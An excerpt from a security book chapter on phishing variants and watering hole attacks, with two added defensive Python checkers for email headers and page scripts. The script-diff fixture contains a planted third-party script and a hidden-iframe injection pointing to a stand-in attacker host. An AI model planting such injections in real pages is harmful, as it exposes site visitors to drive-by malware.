The following is an excerpt from Deception in the Digital Age by authors Cameron H. Malin, Terry Gudaitis, Thomas J. Holt and Max Kilger and published by Syngress. This section from chapter five explores the different types of phishing attacks and watering hole attacks.
Almost everyone enjoys when a magician pulls off a great magic trick or illusion. Getting duped by the trickery and wondering "how did they do that" is the positive reaction desired by the magician and audience members alike. However, falling for the deception of a hacker, phisher, or scammer is never appreciated. No one wants to be tricked by the techniques used by digital con artists who want people to fall prey to their sleight of hand.
Social engineering is a practice used in magic, and Shulman (2015) states, "social engineering is one of the most powerful tools in the hacker's arsenal." A Smithsonian Magazine interview with the renowned magician Teller (of Penn and Teller) revealed seven of his secrets for deceiving his audiences and using psychology to manipulate their minds. Of these seven secrets, several relate directly to the social engineering and hacking techniques used by phishers, scammers, and other online con artists. Four key points from Teller (2013) include:
- exploit pattern recognition;
- keep the trickery outside the frame;
- nothing fools you better than the lie you tell yourself; and
- if you are given a choice, you believe you have acted freely.
This chapter focuses on social engineering and how the digital sleight of hand is used in a variety of cyber attacks including (1) phishing, (2) watering hole attacks, and (3) scareware.
Over the years, there have been many definitions of phishing. According to the InfoSec Institute (2016), "Phishing is an attempt by Internet fraudsters to access and obtain personal and sensitive information, such as usernames, passwords, and financial information, by utilizing social engineering techniques." This type of fraud is actually quite old, dating back to the 1990s when Internet Service Providers (ISP) billed users by the hour for access. Skilled hackers would try to capture the usernames and passwords of unsuspecting victims by posing as an ISP, especially America Online due to its scope and penetration in the market. Fraudsters would harvest known AOL email addresses and send messages claiming to need account updates or validation of user profiles. The mass mailing strategy was like fishing, in that they were hoping to hook victims through deceptive bait. The term "phishing" emerged as a corruption of the term akin to that of phreaking within the general argot of the hacker community. Unsuspecting victims who thought these messages to be legitimate would forward their information to the sender in the hopes of correcting their account. The fraudsters, however, would keep the accounts for their own use or trade the information with others for pirated software or other information.
When phishing is viewed through the lens of the "secrets" described by Teller (2013), the phisher attempts to bait the user by hoping that their emails will:
- be recognized by having the right look and feel of legitimate communications previously received (exploit pattern recognition);
- use tricks outside the frame such as spoofing the email address so that a valid looking sender address is viewed on the "sent line" while the real deception can be seen in the email header (keep trickery outside the frame);
- rely on the theory that most humans will want to do the right thing and fix their account data even if they suspect that their account data is fine or that they do not even have an account with the company allegedly sending the email (nothing fools you better than the lie you tell yourself); and
- rely on the theory that most humans will "choose" to act and provide the requested information, particularly if there is a negative consequence attached if action is not taken (if you are given a choice, you believe you have acted freely).
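The second point above, trickery kept "outside the frame," is the one a defender can check mechanically: the visible From line is inside the frame, while the envelope sender, the Reply-To address and the relay chain recorded in the Received headers sit outside it. The following is an added example, not code from the book or its authors, that compares those headers using only Python's standard `email` package. The two messages are constructed samples using reserved example domains; the domain names, hosts and message ids in them are invented for illustration.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample: the visible From line imitates a bank, while the
# envelope sender, Reply-To and first relay all belong to other domains.
SAMPLE_PHISH = """\
Return-Path: <bounce@mailer.example-bulk.net>
Received: from mailer.example-bulk.net (mailer.example-bulk.net [192.0.2.10])
    by mx.example-victim.org with ESMTP id abc123
From: "Example Bank Security" <alerts@example-bank.com>
Reply-To: "Example Bank" <verify@example-bank-support.net>
To: customer@example-victim.org
Subject: Urgent: validate your account within 24 hours
Content-Type: text/plain; charset="utf-8"

Your account has been limited. Reply with your username and password.
"""

# Constructed sample of an internally consistent message for comparison.
SAMPLE_LEGIT = """\
Return-Path: <alerts@example-bank.com>
Received: from mail.example-bank.com (mail.example-bank.com [198.51.100.5])
    by mx.example-victim.org with ESMTP id def456
From: "Example Bank" <alerts@example-bank.com>
To: customer@example-victim.org
Subject: Your monthly statement is available
Content-Type: text/plain; charset="utf-8"

Log in through your usual bookmark to view the statement.
"""


def _domain(addr) -> str:
    """Return the lower-cased domain of an address header value, or '' if none."""
    _, address = parseaddr(str(addr))
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def header_mismatches(raw_message: str) -> list[str]:
    """Compare the visible From domain with the envelope and reply paths.

    Returns human-readable findings; an empty list means the headers are
    internally consistent, which is necessary but not sufficient for trust.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    from_domain = _domain(msg.get("From", ""))

    # 1. The envelope sender (Return-Path) normally shares the From domain.
    return_domain = _domain(msg.get("Return-Path", ""))
    if return_domain and return_domain != from_domain:
        findings.append(f"Return-Path domain {return_domain!r} != From domain {from_domain!r}")

    # 2. A Reply-To on another domain silently redirects the victim's answer.
    reply_domain = _domain(msg.get("Reply-To", ""))
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain!r} != From domain {from_domain!r}")

    # 3. The earliest Received header (last in the list) names the first relay;
    #    it should sit under the claimed sender's domain.
    received = msg.get_all("Received") or []
    if received:
        first_hop = str(received[-1]).split()[1].lower()  # "from <host> ..." -> host
        if not first_hop.endswith(from_domain):
            findings.append(f"first relay {first_hop!r} is not under {from_domain!r}")
    return findings


if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(label, header_mismatches(sample) or "no header mismatches")
```

None of these three checks is proof on its own: mailing-list relays and outsourced bulk senders legitimately produce Return-Path and relay mismatches, which is why mail systems layer SPF, DKIM and DMARC on top of exactly these header relationships. The value of the check is that it surfaces what the "sent line" hides, so the recipient can verify through a second channel as the chapter recommends.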
Phishing messages often mimic legitimate communications from financial institutions and service providers, such as PayPal or eBay. The message usually contains some of the branding and language commonly used by that institution in an attempt to convince the recipient that the message is legitimate. The message usually suggests that a person's account has been compromised, needs to be updated, or has some problem that must be corrected as soon as possible. The time-sensitive nature of the problem is commonly stressed to confuse or worry the prospective victim in order to ensure a rapid response.
To that end, the email will also include web links that appear to connect to the appropriate website so that the victim can immediately enter their login information for the affected account. Generally, however, the link redirects the user to a different site controlled by the scammer that utilizes collection tools to capture user data. More sophisticated fraudulent sites will also feature branding or logos from the institution to help further promote the legitimacy of the phishing email. Upon arriving at the site, individuals are prompted to enter sensitive information, such as their bank account number, username, password, or even in some cases, personal identification numbers to validate their account. Upon entering the data, it is captured by the scammer for later use and may either redirect the victim back to the original website for the company or provide a page thanking them for their information.
The success of phishing techniques led some to begin to target e-commerce and online banking sites as they became popular with larger segments of the population in the early 2000s. Hackers began to recognize the value in targeting these institutions, and some began to create sophisticated phishing kits that came preloaded with the images and branding of the most prominent global banks. These kits, combined with spam email lists, enabled hackers to readily steal financial data from thousands of unsuspecting users around the world. In fact, the problem of phishing has become so commonplace that over 38,000 unique phishing websites were identified in June of 2013 alone (Anti-Phishing Working Group, 2013). These sites were hosted primarily in the United States due in part to the substantive proportion of hosting resources available to hackers, along with Germany, Canada, France, and the United Kingdom (Anti-Phishing Working Group, 2013). Thus phishing is a global problem that cannot be overstated, though the prevalence of phishing victimization in the general population is largely unknown.
Since 2006, phishing has evolved into several variants including Voice over Internet Protocol (VoIP)/Voice phishing (vishing), short messaging service (SMS) phishing (smishing), spear phishing, and whale phishing. When phishing started in the 1990s, there were no smartphones, tablets, or apps. No one had text messaging, social media, or Wi-Fi yet. Thus as these new technologies and devices emerged, phishing evolved and proliferated to take advantage of the vastly expanding digital environment. All of these phishing variations are based on the same premise as traditional email phishing; the scammers are just using different attack vectors. Smishing is defined as phishing via text message, and vishing is when victims are persuaded to disclose personal details or transfer money over the telephone, cellphone, or VoIP (Keyworth, 2016).
Spear phishing and whale phishing differ a bit from traditional phishing because the victims of these scams are specifically targeted and not part of a mass emailing. There are numerous reasons why a phisher would want to target a specific person. According to the InfoSec Institute (2016), spear phishing is a method used by hackers to gain personal or valuable information and ultimately to gain access to a network by targeting particular individuals within an organization; the first notable cases of spear phishing attacks were recognized around the year 2010.
Spear phishing attacks have targeted government agencies, corporations, banking clients, and universities. The techniques are all very similar, luring the selected group to click a link, download a file, or open an attachment. In the example in Fig. 5.1 below, a typical spear phishing email includes the core elements of deception as the scammers try to coerce university webmail users into giving up personal identifiable information.
Instead of targeting a population that belongs to a certain organization, spear phishers also send out large volumes of scam emails, which have a high probability of reaching real users of a particular service. Over the years, services like PayPal have been used as phishing lures to collect account data and passwords from legitimate PayPal users. In the example below, the spear phish actually uses the account holder's correct name and email address. Other elements of the phishing email appear to be real, as the scammers use the company's logo and do not make some of the spelling and grammatical errors commonly seen in spam. One of the tricks presented is to hide the actual URL where the user would put in username, password, and account information. But if the user hovers the mouse/cursor over the link, the real URL will appear; in this example case, the actual URL goes to a site in Russia. The example in Fig. 5.2 uses a fictitious company (ElectroPay Service); however, the elements of deception are typical.
Around the same time period, other industrious hackers went after persons of notoriety or high net worth, otherwise known as "whales." The idea was that targeting those with power, influence, and money would reap better rewards for the attackers. Whale phishing has more recently morphed into "whaling," in which the scammers are using legitimate executive names and email addresses to persuade unsuspecting employees to wire money, sensitive business documents, tax forms, or human resource information to their accounts (Boulton, 2016). Whether the attack vector is email, phone, or text message, the underlying deceptive techniques are basically the same, using deceptive techniques to take advantage of our emotions, cognitive biases, and human physiology (i.e., fatigue, illness, injury).
One well-publicized whaling attack targeted the toy company, Mattel. In 2015, an account executive appeared to receive an email from the CEO of Mattel requesting that a payment be made to a new vendor in China. While nothing appeared to violate policy, procedure, or protocol (and the account executive wanted to impress the new CEO), a payment was made to the "new vendor" (Ragan, 2016). Of course, there was no new vendor. Mattel lost three million dollars because of an orchestrated social engineering attack. Remember Teller's "secret sauce of deception":
- exploit pattern recognition: the email appeared to come from the CEO and looked legitimate;
- keep the trickery outside the frame: the IP address associated with the sent email did not originate from within the company, and the money was not wired to a named vendor's account but to an unnamed bank account number;
- nothing fools you better than the lie you tell yourself: the account executive was convinced that sending the money was the right thing to do (even though it was a banking holiday in China and their new vendor would also most likely be on holiday); and
- if you are given a choice, you believe you have acted freely: the account executive wanted to please the new CEO and not wiring money to the new vendor would have certainly been insubordination (although the account executive never initiated a verbal confirmation with the real CEO).
Audience members attending a magic show typically do not shout out or ask, "hey, what is in your other hand?", but when it comes to digital deception, it becomes necessary to ask. If a certain communication is asking for too much information or highly sensitive information, it is worthwhile to ask, and to do the asking via a different communications mode. If the communication comes in through email, call the would-be sender. If the communication comes in through text message, use email. While in some circumstances it may be unusual or uncomfortable to double-check, no one wants to be duped, and certainly not out of millions of dollars.
Watering Hole Attacks (Strategic Web Compromises)
As victim organizations and users have become more cautious and aware of spear phishing attacks, cyber attackers have developed new, creative methods to circumvent technical countermeasures and user vigilance. One of these burgeoning attack methods, watering hole attacks, or strategic web compromises, shifts the attack vector away from targeting victim communication platforms, particularly email, to compromising web servers, and in turn, the target victim group(s) that are known or likely to navigate to the website.
Gaining salience in 2009, and growing in sophistication over time, watering hole attacks pose a challenging threat to defend against. While the attack name is certainly curious on first impression, it is thematically accurate, since it is based on the observed process in nature where concealed predators wait near small bodies of water used by their prey to drink and cool off, striking while prey are otherwise distracted (Fig. 5.3).
One of the most prominent examples of a watering hole attack is the security incident dubbed Operation Aurora by the security vendor McAfee. In 2009, as many as three groups of very sophisticated Chinese hackers compromised multiple high-level targets including Google, Adobe, Juniper Networks, Yahoo, Symantec, Northrop Grumman, and Dow Chemical (Shmugar, 2010; Zetter, 2010). The attackers utilized various methods to gain access to these institutions, though one of the most prevalent attack techniques was a watering hole strategy employed by a group referred to as the Elderwood Gang (Clayton, 2012). The group would spear phish employees to click on links to a website hosting malware that would exploit a specific zero-day vulnerability in the Internet Explorer web browser. From there, the attackers appeared to use these infected systems as launch points to identify and compromise source code repositories within these companies (Markoff & Barboza, 2010; Zetter, 2010).
In 2013, the sophistication of strategic web compromises escalated, leading to high-profile breaches. In particular, a watering hole attack was used in 2013 that targeted a page regarding Site Exposure Matrices (SEM) on the US Department of Labor's website (Kaplan, 2013). The page contained a malicious script that directed victims to a separate page hosting the Poison Ivy remote access Trojan and used an exploit for a common vulnerability in the Microsoft Internet Explorer browser that had been patched a few months prior to this incident. The content of the page that was compromised gives some potential insights into the target of the attack, as the SEM page details toxic substances commonly present at nuclear sites and the potential health concerns stemming from exposure to those materials (Kaplan, 2013). Further, sophisticated watering hole attacks such as those attributed to the "Hidden Lynx" hacking group, who were responsible for the VOHO Campaign and the attacks against the security firm Bit9, demonstrated how potent these attacks could be, even against technically sophisticated victims.
With the success of these attacks, cyber adversaries continued this momentum into 2014 and 2015. With new web browsers such as Internet Explorer 10 emerging, attackers quickly developed zero-day exploits to insidiously compromise these programs, stealthily placing these tools in secretly compromised websites trusted by the victims who visited them. The aerospace and automotive industries were heavily targeted, revealing the attackers' victim selection, motivations, and willingness to craft, refine, and patiently execute strategic web compromises against these highly desired victims. Understanding the watering hole attack deception chain and the deception principles implemented by the attackers helps elucidate why these pernicious attacks are successful and will continue to be a threat in the cyber landscape.
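The Department of Labor case above turned on a script added to a trusted page that sent visitors to a separate exploit page. From the site owner's side, the practical defence is an inventory of the scripts a page is supposed to carry, compared against what it carries now. The following is an added example, not code from the book or its authors, that extracts every external script source and a SHA-256 digest of every inline script from two HTML snapshots and reports what the current copy has that the baseline did not, separating same-origin additions from third-party hosts. Both page snapshots, the site host and the third-party host are constructed for illustration using reserved example domains; the SEM page itself is not reproduced.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed baseline snapshot of a page, taken when it was known to be clean.
BASELINE_PAGE = """
<html><head>
<script src="/static/app.js"></script>
<script>window.sem = {version: 3};</script>
</head><body><h1>Site Exposure Matrices</h1></body></html>
"""

# Constructed later snapshot: one third-party script and one inline
# script have been added to the head.
CURRENT_PAGE = """
<html><head>
<script src="/static/app.js"></script>
<script>window.sem = {version: 3};</script>
<script src="http://cdn.attacker.example.net/stats.js"></script>
<script>document.write('<iframe src="http://cdn.attacker.example.net/l.html" width=0 height=0></iframe>');</script>
</head><body><h1>Site Exposure Matrices</h1></body></html>
"""


class _ScriptCollector(HTMLParser):
    """Record every external script source and a digest of every inline script body."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline_digests = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so the iframe
        # string inside document.write() is captured rather than parsed.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip()
            self.inline_digests.append(hashlib.sha256(body.encode()).hexdigest())
            self._in_script = False


def _collect(page_html: str) -> _ScriptCollector:
    parser = _ScriptCollector()
    parser.feed(page_html)
    return parser


def script_changes(baseline_html: str, current_html: str, site_host: str) -> dict:
    """Diff a page's script inventory against its known-good snapshot.

    Relative sources have no hostname and count as same-origin; anything on a
    host other than site_host is reported separately as third-party.
    """
    base, cur = _collect(baseline_html), _collect(current_html)
    new_external = [s for s in cur.external if s not in base.external]
    third_party = [s for s in new_external
                   if (urlparse(s).hostname or site_host).lower() != site_host.lower()]
    new_inline = [d for d in cur.inline_digests if d not in base.inline_digests]
    return {
        "new_external": new_external,
        "new_third_party": third_party,
        "new_inline_count": len(new_inline),
    }


if __name__ == "__main__":
    print(script_changes(BASELINE_PAGE, CURRENT_PAGE, "www.example.org"))
```

Hashing inline bodies rather than storing them keeps the baseline small and makes any edit, however minor, show up as a new entry; a Content-Security-Policy that lists the same allowed script hosts and hashes gives the browser the same inventory to enforce on the visitor's side.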
About the authors:
Cameron H. Malin is a Certified Ethical Hacker (C|EH) and Certified Network Defense Architect (C|NDA) as designated by the International Council of Electronic Commerce Consultants (EC-Council); a GIAC Certified Intrusion Analyst (GCIA), GIAC Certified Forensic Analysis (GCFA), a GIAC Certified Incident Handler (GCIH), GIAC Certified Reverse Engineering Malware professional (GREM), GIAC Penetration Tester (GPEN), and GIAC Certified Unix Security Administrator (GCUX) as designated by the SANS Institute; and a Certified Information Systems Security Professional (CISSP), as designated by the International Information Systems Security Certification Consortium ((ISC)2®).
Mr. Malin is currently a Supervisory Special Agent with the Federal Bureau of Investigation assigned to the Behavioral Analysis Unit, Cyber Behavioral Analysis Center. He is also a Subject Matter Expert for the Department of Defense (DoD) Cyber Security & Information Systems Information Analysis Center and Defense Systems Information Analysis Center. Mr. Malin was previously an Assistant State Attorney (ASA) and Special Assistant United States Attorney in Miami, Florida, where he specialized in computer crime prosecutions. During his tenure as an ASA, he was also an Assistant Professorial Lecturer in the Computer Fraud Investigations Masters Program at George Washington University.
The techniques, tools, methods, views, and opinions explained by Cameron Malin are personal to him, and do not represent those of the United States Department of Justice, the Federal Bureau of Investigation, or the government of the United States of America. Neither the Federal government nor any Federal agency endorses this book or its contents in any way.
Dr. Terry Gudaitis is the Owner/Principal of Mindstar Security & Profiling, LLC, which specializes in custom cyber and physical security solutions for family offices, high net worth individuals, and their families. She started her career as a CIA operations officer and behavioral profiler. Dr. Gudaitis left government service to pursue the expansion of profiling techniques as they applied to hackers targeting the financial services and energy sectors. She altered classic behavioral/psychological profiling methods used in homicide, serial crime, and terrorist investigation and adapted them for applied use in computer crime investigations, which included the integration of cyber intelligence as part of the investigations process. Prior to forming her own firm, Dr. Gudaitis was the Vice President and Cyber Intelligence Director at Cyveillance and held senior positions at other private sector firms. In addition to her corporate related work, she is on the Advisory Boards of Mi3 Security Inc. and TechnoSecurity; has served on the United States Secret Service Advisory Board for Insider Threat; trained investigators at the National Center for Missing and Exploited Children; and regularly presents at national and international conferences. Dr. Gudaitis is also a featured speaker at the International Spy Museum in Washington, DC. She received a Ph.D. in behavioral science from the University of Florida.
Dr. Thomas Holt is a Professor in the School of Criminal Justice at Michigan State University specializing in cybercrime, policing, and policy. He received his Ph.D. in Criminology and Criminal Justice from the University of Missouri-Saint Louis in 2005. Dr. Holt has published extensively on cybercrime and cyberterror with more than 35 peer-reviewed articles in outlets such as Crime and Delinquency, Sexual Abuse, the Journal of Criminal Justice, Terrorism and Political Violence, and Deviant Behavior. He is also a co-author of the books Cybercrime and Digital Forensics: An Introduction (2015) and Policing Cybercrime and Cyberterror (2015). Dr. Holt has also received multiple grants from the National Institute of Justice and the National Science Foundation to examine the social and technical drivers of Russian malware writers, data thieves, and hackers using on-line data. He has given multiple presentations on computer crime and hacking at academic and professional conferences, as well as hacker conferences across the country including Defcon and HOPE.
Max Kilger, Ph.D. is a Senior Lecturer in the Department of Information Systems & Cyber Security at the University of Texas at San Antonio (UTSA) and also the Director of the Masters in Data Analytics Program at UTSA. He received his Ph.D. in Social Psychology from Stanford University. Dr. Kilger has more than seventeen years of experience in the area of information security, concentrating on the social and psychological factors motivating malicious online actors, hacking groups and cyberterrorists. He has written and co-authored a number of journal articles and book chapters on profiling, the social structure of the hacking community, cyberviolence and the emergence of cyberterrorism. Dr. Kilger is a founding and board member of the Honeynet Project, a not-for-profit information security organization with 54 teams of experts in 44 countries working for the public good. He was a member of a National Academy of Engineering committee dedicated to make recommendations for combating terrorism. Dr. Kilger is also a member of a multinational instructional team for a NATO counterterrorism course.